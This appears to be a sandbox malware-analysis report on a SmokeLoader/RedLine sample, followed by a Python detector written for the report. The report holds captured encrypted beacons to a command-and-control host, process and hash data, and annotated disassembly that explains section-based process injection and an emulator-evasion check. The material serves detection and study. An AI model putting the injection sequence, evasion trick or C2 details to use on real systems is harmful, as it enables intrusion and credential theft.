Data Ascii: ;n$Rwz}t~{A**R? 9Yt M@NA .[k,vu+C^Rubx4HFwii]X'23JVC5D*u%@<>|,3


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 58683 | 201.124.145.196 | 80 | 2580 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 18:40:11.621645927 CEST | 284 | OUT | POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://gucrgvicowjmruy.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 228
Host: tnc-corp.ru
Oct 24, 2024 18:40:11.621646881 CEST | 228 | OUT | Data Raw: 3b 6e 24 12 f7 bc 1b 52 a9 d9 c0 77 0f 01 7a b9 7d 0f b9 e7 1f 74 90 15 0b 7e 7b e1 41 c5 c6 1d 98 2a ce 2a 02 19 52 11 ee ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 5b 0a ed e6
Data Ascii: ;n$Rwz}t~{A**R? 9Yt M@NA .[k,vu[L2b1PI<zpN`~,bH(Mcy-!utD!)p`W"oAwqC'R2*'%kv)"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 58684 | 201.124.145.196 | 80 | 2580 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 18:40:26.494584084 CEST | 281 | OUT | POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://gdvvxgrxcdrf.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 119
Host: tnc-corp.ru
Oct 24, 2024 18:40:26.494601011 CEST | 119 | OUT | Data Raw: 3b 6e 24 12 f7 bc 1b 52 a9 d9 c0 77 0f 01 7a b9 7d 0f b9 e7 1f 74 90 15 0b 7e 7b e1 41 c5 c6 1d 98 2a ce 2a 02 19 52 11 ee ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 5d 07 ad 93
Data Ascii: ;n$Rwz}t~{A**R? 9Yt M@NA .[k,vu]&QVMK!R0LL


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 58685 | 201.124.145.196 | 80 | 2580 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 18:40:44.713968992 CEST | 281 | OUT | POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://iiqfsjirxhqu.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 365
Host: tnc-corp.ru
Oct 24, 2024 18:40:44.714004040 CEST | 365 | OUT | Data Raw: 3b 6e 24 12 f7 bc 1b 52 a9 d9 c0 77 0f 01 7a b9 7d 0f b9 e7 1f 74 90 15 0b 7e 7b e1 41 c5 c6 1d 98 2a ce 2a 02 19 52 11 ee ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 53 25 e9 99
Data Ascii: ;n$Rwz}t~{A**R? 9Yt M@NA .[k,vuS%rL$;h>Ej puR0jR2=TT"Ea]_$7opE/K~_P^*OtIVgNHOez,?O^r


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 58686 | 201.124.145.196 | 80 | 2580 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 18:41:02.565610886 CEST | 282 | OUT | POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://lqjnthfwecsdh.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 295
Host: tnc-corp.ru
Oct 24, 2024 18:41:02.565638065 CEST | 295 | OUT | Data Raw: 3b 6e 24 12 f7 bc 1b 52 a9 d9 c0 77 0f 01 7a b9 7d 0f b9 e7 1f 74 90 15 0b 7e 7b e1 41 c5 c6 1d 98 2a ce 2a 02 19 52 11 ee ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 2e 5f cb 9e
Data Ascii: ;n$Rwz}t~{A**R? 9Yt M@NA .[k,vu._[0`Nj7/*vtBxL>n4[c:5:1zZPGKcujn0[!(Q[tvbc=?nuR(W-


                                                      Target ID:0
                                                      Start time:12:37:10
                                                      Start date:24/10/2024
                                                      Path:C:\Users\user\Desktop\kGSZ4dCqYh.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\kGSZ4dCqYh.exe"
                                                      Imagebase:0x400000
                                                      File size:399'360 bytes
                                                      MD5 hash:BAB1912F10355B913050217669ACC322
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1862957209.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1862980152.0000000000630000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1862980152.0000000000630000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1863029600.0000000000651000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1863029600.0000000000651000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1862925311.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                      Reputation:low
                                                      Has exited:true

                                                      Target ID:1
                                                      Start time:12:37:16
                                                      Start date:24/10/2024
                                                      Path:C:\Windows\explorer.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\Explorer.EXE
                                                      Imagebase:0x7ff72b770000
                                                      File size:5'141'208 bytes
                                                      MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:false

                                                      Target ID:5
                                                      Start time:12:37:35
                                                      Start date:24/10/2024
                                                      Path:C:\Users\user\AppData\Roaming\dvjdfvr
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Users\user\AppData\Roaming\dvjdfvr
                                                      Imagebase:0x400000
                                                      File size:399'360 bytes
                                                      MD5 hash:BAB1912F10355B913050217669ACC322
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000005.00000002.2090478524.0000000000550000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.2090513435.0000000000560000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.2090513435.0000000000560000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.2090678627.0000000001FF1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.2090678627.0000000001FF1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000005.00000002.2090450815.0000000000520000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                      Antivirus matches:
                                                      • Detection: 100%, Avira
                                                      • Detection: 100%, Joe Sandbox ML
                                                      • Detection: 39%, ReversingLabs
                                                      Reputation:low
                                                      Has exited:true

                                                      Target ID:7
                                                      Start time:12:40:01
                                                      Start date:24/10/2024
                                                      Path:C:\Users\user\AppData\Roaming\dvjdfvr
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Users\user\AppData\Roaming\dvjdfvr
                                                      Imagebase:0x400000
                                                      File size:399'360 bytes
                                                      MD5 hash:BAB1912F10355B913050217669ACC322
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low
                                                      Has exited:false

                                                        Execution Graph

                                                        Execution Coverage:8.9%
                                                        Dynamic/Decrypted Code Coverage:100%
                                                        Signature Coverage:37%
                                                        Total number of Nodes:108
                                                        Total number of Limit Nodes:2

                                                        Control-flow Graph (rendered figure; executed/not-executed colouring not reproduced)
                                                        • Blocks of sub_401583 (entry 401583-4015de, call 401207): 401634-40164b NtDuplicateObject; 401651-401675 NtCreateSection; 401677-401698 NtMapViewOfSection; 40169a-4016b6 NtMapViewOfSection; 4016d1-4016f7 NtCreateSection; 401707-401728 NtMapViewOfSection; 40172e-40174a NtMapViewOfSection; 401750 call 401755. Each API block has one edge to the next call and one to the common exit 401907, which leads into 401916-401956 (call 401207).
                                                        APIs
                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
                                                          SourceHandle and TargetProcessHandle are both 000000FF, the listing's rendering of the sign-extended push -1 immediate (0xFF is not 4-byte aligned, so it cannot be a real handle value), i.e. the current-process pseudo-handle; Options 00000002 = DUPLICATE_SAME_ACCESS. Duplicating pseudo-handle -1 in the context of the (runtime-determined) source process handle is the known way to obtain a full-access handle to that process.
                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
                                                          DesiredAccess 00000006 = SECTION_MAP_WRITE | SECTION_MAP_READ, SectionPageProtection 00000004 = PAGE_READWRITE, AllocationAttributes 08000000 = SEC_COMMIT, FileHandle 0: a pagefile-backed read/write section.
                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693
                                                          ProcessHandle -1 (current process), InheritDisposition 00000001 = ViewShare, Win32Protect 00000004 = PAGE_READWRITE. The eleventh value is the next stack slot, not a parameter.
                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016B1
                                                          Same section mapped PAGE_READWRITE into a second, runtime-determined process handle.
                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016F2
                                                          DesiredAccess 0000000E adds SECTION_MAP_EXECUTE, SectionPageProtection 00000040 = PAGE_EXECUTE_READWRITE, SEC_COMMIT, pagefile-backed: the second section is created executable.
                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401723
                                                          Executable section mapped PAGE_READWRITE into the current process (the side that is written to).
                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401745
                                                          Same section mapped with Win32Protect 00000020 = PAGE_EXECUTE_READ into the other process (the side that executes). Taken together, the seven calls are the section-based injection pattern: write locally, execute remotely, with no WriteProcessMemory and no VirtualAllocEx in the target.
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1862464987.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_kGSZ4dCqYh.jbxd
                                                        Similarity
                                                        • API ID: Section$View$Create$DuplicateObject
                                                        • String ID:
                                                        • API String ID: 1546783058-0
                                                        • Opcode ID: d8025aa2a73fa1757bf9d96cb7b1acd78e4ac8c64498884b03c6ab91ddf532bc
                                                        • Instruction ID: f2d5e20ae79a609852431105b0704d648b73f45673a5aa535929140ce5e9a1ec
                                                        • Opcode Fuzzy Hash: d8025aa2a73fa1757bf9d96cb7b1acd78e4ac8c64498884b03c6ab91ddf532bc
                                                        • Instruction Fuzzy Hash: 42614DB0900209FFEB218F91CC48FAF7BB8EF85710F10012AF952BA1E5D6749941DB25

                                                        Control-flow Graph (rendered figure; executed/not-executed colouring not reproduced)
                                                        • Same routine entered at 40158e (40158e-4015b6 → 4015c8 or 4015bf-4015de call 401207), then the block sequence of sub_401583: 401634-40164b NtDuplicateObject; 401651-401675 NtCreateSection; 401677-401698 and 40169a-4016b6 NtMapViewOfSection; 4016d1-4016f7 NtCreateSection; 401707-401728 and 40172e-40174a NtMapViewOfSection; 401750 call 401755; common exit 401907 → 401916-401956 (call 401207).
                                                        APIs
                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693
                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016B1
                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016F2
                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401723
                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401745
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1862464987.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_kGSZ4dCqYh.jbxd
                                                        Similarity
                                                        • API ID: Section$View$Create$DuplicateObject
                                                        • String ID:
                                                        • API String ID: 1546783058-0
                                                        • Opcode ID: b0195c2069dc6e331d8d87e09b392f04d65fbe6eaf74cb5c44d370e3a2e163ea
                                                        • Instruction ID: 0dfbee2a1f0830b6acdc9e972913786be015a59f94024eee438c43ca1dd55f4f
                                                        • Opcode Fuzzy Hash: b0195c2069dc6e331d8d87e09b392f04d65fbe6eaf74cb5c44d370e3a2e163ea
                                                        • Instruction Fuzzy Hash: BA5139B1900249BFEF218F91CC49FEBBFB8EF86714F140159F951AA2A5D670A941CB24

                                                        Control-flow Graph (rendered figure; executed/not-executed colouring not reproduced)
                                                        • Same routine entered at 4015bc (4015bc-4015c5 → 4015ca call 401207 → 4015d0-4015de), then the block sequence of sub_401583: 401634-40164b NtDuplicateObject; 401651-401675 NtCreateSection; 401677-401698 and 40169a-4016b6 NtMapViewOfSection; 4016d1-4016f7 NtCreateSection; 401707-401728 and 40172e-40174a NtMapViewOfSection; 401750 call 401755; common exit 401907 → 401916-401956 (call 401207).
                                                        APIs
                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693
                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016B1
                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016F2
                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401723
                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401745
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1862464987.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_kGSZ4dCqYh.jbxd
                                                        Similarity
                                                        • API ID: Section$View$Create$DuplicateObject
                                                        • String ID:
                                                        • API String ID: 1546783058-0
                                                        • Opcode ID: cc208e499be32a7b8d2e1b8f44698ba7bae8291931bb2c7a737ae2018edfaae9
                                                        • Instruction ID: 9e9cfe78a9b9fcbe8a20f4c56589f3f995e8910032e3214eb5438fd9bfe06916
                                                        • Opcode Fuzzy Hash: cc208e499be32a7b8d2e1b8f44698ba7bae8291931bb2c7a737ae2018edfaae9
                                                        • Instruction Fuzzy Hash: 855129B1900249BFEF218F91CC48FAFBBB8EF86B15F100159F951AA2A5D7709940CB20

                                                        Control-flow Graph (rendered figure; executed/not-executed colouring not reproduced)
                                                        • Blocks of sub_403054: 403054-403078 → exit 403197-40319c or 40307e-403096 → 40309c-4030ad → a loop over 4030af-40312b (inner loop 4030bd-4030cb; branches 4030d6-4030f5 and 4030ff-40311e) → 40312d-403137 → 403139-403194 RtlCreateUserThread, NtTerminateProcess → 403197-40319c. The thread is created in another process and the current process is then terminated.
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1862464987.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_kGSZ4dCqYh.jbxd
                                                        Similarity
                                                        • API ID: CreateProcessTerminateThreadUser
                                                        • String ID:
                                                        • API String ID: 1921587553-0
                                                        • Opcode ID: ba71293914487d9c4508611429cc1c96d45b5da92adc1af413e838efc5e3ffef
                                                        • Instruction ID: bb3d83799e525a3431e0f051c565fd2002d42970a2b52bf5f395df3a052ac564
                                                        • Opcode Fuzzy Hash: ba71293914487d9c4508611429cc1c96d45b5da92adc1af413e838efc5e3ffef
                                                        • Instruction Fuzzy Hash: 9F412732618E0C4FD768EE6CA84966377D5E798311F1A43ABD809D7389EE30D85187C5

                                                        Control-flow Graph (rendered figure; executed/not-executed colouring not reproduced)
                                                        • Blocks of sub_6019d7: 6019d7-6019f0 → 6019f2-6019f4 (→ 6019f6) → 6019fb-601a07 CreateToolhelp32Snapshot → 601a09-601a0f → 601a11-601a15, which either loops back to 6019f2 (snapshot retry) or continues to 601a17-601a24 Module32First → 601a26-601a27 call 601696 → 601a2c → 601a2d-601a35.
                                                        APIs
                                                        • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 006019FF
                                                          dwFlags 00000008 = TH32CS_SNAPMODULE, th32ProcessID 0 = the calling process: the snapshot lists the modules loaded in the sample's own process.
                                                        • Module32First.KERNEL32(00000000,00000224), ref: 00601A1F
                                                          dwSize 00000224 = 548 = sizeof(MODULEENTRY32) for a 32-bit ANSI build. Only Module32First is called in this function (no Module32Next), so only the first entry is used before 601696 (VirtualAlloc) is invoked.
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1862925311.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5f0000_kGSZ4dCqYh.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateFirstModule32SnapshotToolhelp32
                                                        • String ID:
                                                        • API String ID: 3833638111-0
                                                        • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                        • Instruction ID: 7069c18228d0ffb264b2c9333f6c58bf6fb7589aae838ab9b83557068d1c4ec7
                                                        • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                        • Instruction Fuzzy Hash: 15F0CD322403116BD7242BF9A88DBAB72E9AF4A720F100628F642A91C0DA70EC054A60

                                                        Control-flow Graph (rendered figure; executed/not-executed colouring not reproduced)
                                                        • Blocks of sub_62003c: 62003c-620047 (→ 620049) → 62004c-620263 call 620a3f, call 620e0f, call 620d90, VirtualAlloc → 620265-620289 call 620a69 or 62028b-620292 → copy loop 6202a1-6202cc → 6202ce-6203c2 VirtualProtect, call 620cce, call 620ce7 → loop 6203d1-6203e0 / 6203e2-620437 call 620ce7 → 620439-6204b8 VirtualFree → a large table-walking loop over 6204be-62086c → 62086e-6208be LoadLibraryA → 6208c7-6208f9 → 6208fb-620901 / 620902-62091d.
                                                        APIs
                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0062024D
                                                          lpAddress NULL, flAllocationType 00001000 = MEM_COMMIT, flProtect 00000004 = PAGE_READWRITE. The same function later calls VirtualProtect, VirtualFree and LoadLibraryA with the string "kernel32.dll" in reach, the shape of an in-memory loader that unpacks into fresh memory, fixes page permissions and resolves imports.
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1862957209.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_620000_kGSZ4dCqYh.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocVirtual
                                                        • String ID: cess$kernel32.dll
                                                        • API String ID: 4275171209-1230238691
                                                        • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                        • Instruction ID: 42ec4702e70d4e90e99a8a4f860a1c510c2e99c0fd791167ea9c40f41969c617
                                                        • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                        • Instruction Fuzzy Hash: FB526874A01229DFDB64CF58D985BA8BBB1BF09304F1480D9E94DAB352DB30AE85DF14

                                                        Control-flow Graph (rendered figure; executed/not-executed colouring not reproduced)
                                                        • Blocks of sub_620e0f: 620e0f-620e24 SetErrorMode, SetErrorMode → conditional edge to 620e26 or directly to 620e2b-620e2c.
                                                        APIs
                                                        • SetErrorMode.KERNELBASE(00000400,?,?,00620223,?,?), ref: 00620E19
                                                        • SetErrorMode.KERNELBASE(00000000,?,?,00620223,?,?), ref: 00620E1E
                                                          Two back-to-back calls, 5 bytes apart, returning to 00620223 inside the loader at 62003c. Mode 00000400 is not one of the documented SEM_* bits (SEM_FAILCRITICALERRORS 0x1, SEM_NOGPFAULTERRORBOX 0x2, SEM_NOALIGNMENTFAULTEXCEPT 0x4, SEM_NOOPENFILEERRORBOX 0x8000); the second call resets the mode and returns the previous one, which on real Windows is 0x400. The conditional branch immediately after the calls (620e24 → 620e26 or 620e2b) is consistent with the well-known SetErrorMode(1024) / SetErrorMode(0) != 1024 emulator check rather than with any error-handling purpose.
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1862957209.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_620000_kGSZ4dCqYh.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorMode
                                                        • String ID:
                                                        • API String ID: 2340568224-0
                                                        • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                        • Instruction ID: ca7d39d3f00bb23aeb65542139c9111eb9232972a72a4ee517b453a7e7f206fa
                                                        • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                        • Instruction Fuzzy Hash: FCD0123114512877D7002A94DC09BCD7B1CDF05B62F008411FB0DD9581C770994046E5
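Both of the patterns the listings above expose, the section-mapping sequence of sub_401583 (an executable pagefile-backed section mapped writable into the current process and executable into a second process handle) and the SetErrorMode(0x400) / SetErrorMode(0) pair of sub_620E0F, can be flagged mechanically from the report's APIs lines. The Python below is an added example written for this page; it is not Joe Sandbox code and not part of the report. It assumes that the listing's 000000FF process-handle arguments denote the -1 current-process pseudo-handle (0xFF is not 4-byte aligned, so it cannot be a real handle), takes the Windows constants from the SDK headers, and uses a 16-byte adjacency window for the SetErrorMode pair that is the author's own choice. The sample input is constructed by copying the report's own lines.

```python
import re
from dataclasses import dataclass

# Parser for the "APIs" lines of a Joe Sandbox disassembly report, e.g.
#   • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016F2
# Arguments are hex as printed by the IDA plugin; "?" (not recoverable from the
# memory snapshot) is kept as None so the detectors can treat it as "unknown".
API_LINE = re.compile(
    r"(?P<name>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")


@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: int


def parse_listing(text):
    calls = []
    for line in text.splitlines():
        m = API_LINE.search(line)
        if not m:
            continue
        args = [None if a.strip() == "?" else int(a, 16) for a in m["args"].split(",")]
        calls.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16)))
    return calls


def arg(call, i):
    """i-th argument, or None when the listing shows fewer values or an unknown one."""
    return call.args[i] if i < len(call.args) else None


# Windows SDK constants (winnt.h / winbase.h).
PAGE_EXECUTE_READWRITE = 0x40
EXECUTABLE_PAGE = {0x10, 0x20, 0x40, 0x80}          # PAGE_EXECUTE* family
SEC_COMMIT = 0x08000000
SEM_DOCUMENTED = 0x0001 | 0x0002 | 0x0004 | 0x8000  # the four documented SEM_* bits
# Assumption: the listing prints the sign-extended `push -1` immediate as 000000FF.
# 0xFF is not 4-byte aligned, so it cannot be a real handle; read it as (HANDLE)-1.
CURRENT_PROCESS = {0xFF, 0xFFFFFFFF}


def detect_section_injection(calls):
    """Write-locally / execute-remotely: a pagefile-backed section created with
    PAGE_EXECUTE_READWRITE, mapped into the current process and also mapped with an
    executable protection into a handle that is not the current process.
    Returns the sorted refs of the calls forming the pattern, or [] if absent."""
    rwx = [c for c in calls if c.name == "NtCreateSection"
           and arg(c, 4) == PAGE_EXECUTE_READWRITE          # SectionPageProtection
           and arg(c, 5) is not None and arg(c, 5) & SEC_COMMIT
           and arg(c, 6) == 0]                              # FileHandle NULL: pagefile-backed
    maps = [c for c in calls if c.name == "NtMapViewOfSection"]
    local = [c for c in maps if arg(c, 1) in CURRENT_PROCESS]
    # A runtime-computed target handle shows up as "?" in the listing; that is what
    # separates it from the constant -1 pushes, so None counts as "not current process".
    foreign_exec = [c for c in maps if arg(c, 1) not in CURRENT_PROCESS
                    and arg(c, 9) in EXECUTABLE_PAGE]       # Win32Protect of the view
    if rwx and local and foreign_exec:
        return sorted({c.ref for c in rwx + local + foreign_exec})
    return []


def detect_seterrormode_probe(calls, max_gap=16):
    """SetErrorMode(x) followed within max_gap bytes by SetErrorMode(0): the second
    call returns x on real Windows, which some emulators get wrong.  Each hit is
    (ref, x, x_has_undocumented_bits); x outside the SEM_* bits is the stronger signal."""
    sem = [c for c in calls if c.name == "SetErrorMode"]
    hits = []
    for first, second in zip(sem, sem[1:]):
        mode = arg(first, 0)
        if mode and arg(second, 0) == 0 and 0 < second.ref - first.ref <= max_gap:
            hits.append((first.ref, mode, bool(mode & ~SEM_DOCUMENTED)))
    return hits


# Constructed input: lines copied from this report's listings for sub_401583 and
# sub_620E0F; the bullet glyph is ignored by the parser.
REPORT_LINES = """
• NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
• NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016B1
• NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016F2
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401723
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401745
• SetErrorMode.KERNELBASE(00000400,?,?,00620223,?,?), ref: 00620E19
• SetErrorMode.KERNELBASE(00000000,?,?,00620223,?,?), ref: 00620E1E
"""


def analyse(text):
    calls = parse_listing(text)
    return {"section_injection": detect_section_injection(calls),
            "seterrormode_probe": detect_seterrormode_probe(calls)}


if __name__ == "__main__":
    result = analyse(REPORT_LINES)
    print("section injection refs:", [hex(r) for r in result["section_injection"]])
    print("SetErrorMode probes:",
          [(hex(r), hex(m), undoc) for r, m, undoc in result["seterrormode_probe"]])
```

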